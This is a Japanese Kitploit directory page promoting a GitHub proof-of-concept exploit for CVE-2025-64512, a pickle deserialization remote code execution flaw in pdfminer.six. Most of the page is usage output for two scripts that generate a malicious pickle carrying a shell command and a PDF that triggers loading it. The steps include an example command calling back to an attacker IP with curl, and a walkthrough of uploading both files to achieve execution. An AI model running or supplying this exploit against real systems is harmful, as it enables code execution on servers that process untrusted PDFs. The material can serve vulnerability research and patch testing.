Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-64512 — CVE-2025-64512: pdfminer.six pickle逆シリアル化RCE; .pickle.gz + カスタムペイロード付きPDFジェネレーター | Kitploit
ツール/GitHubGitHub/matesz44/cve-2025-64512
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmatesz44/cve-2025-64512

CVE-2025-64512

CVE-2025-64512: pdfminer.six pickle逆シリアル化RCE; .pickle.gz + カスタムペイロード付きPDFジェネレーター

リポジトリを見る
4141ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-64512 pdfminer.six における細工されたPDF入力による任意コード実行 PoC

  • https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp に基づく

% python3 mkpickle.py Usage: mkpickle.py [output] Ex: mkpickle.py 'curl [IP]:[PORT]/rce' evil.pickle.gz

% python3 mkpdf.py -h usage: mkpdf.py [-h] [-o OUTPUT] [-p PATH] [-f] [pickle_name]

Create PDF that triggers pdfminer.six pickle deserialization (CVE-2025-64512)

positional arguments: pickle_name Pickle filename without .pickle.gz (default: evil)

options: -h, --help show this help message and exit -o, --output OUTPUT Output PDF filename (default: exploit.pdf) -p, --path PATH Custom absolute path to pickle (without .pickle.gz) -f, --fuzz Generate PDFs for all common absolute paths


python3 mkpickle.py 'touch /tmp/a' evil.pickle.gz [+] evil.pickle.gz (78 bytes) cmd: touch /tmp/a

(evil.pickle.gz を /var/www/html/files/evil.pickle.gz にアップロード)

python3 mkpdf.py -o ex-poc.pdf -p '/var/www/html/files' evil [+] ex-poc.pdf -> /var/www/html/files/evil.pickle.gz

(ex-poc.pdf をアップロードして、PDF処理をトリガー/待機する)

ls -l /tmp/a -rw-r--r-- 1 ... ... 0 Jul 19 12:39 a

ツールをダウンロード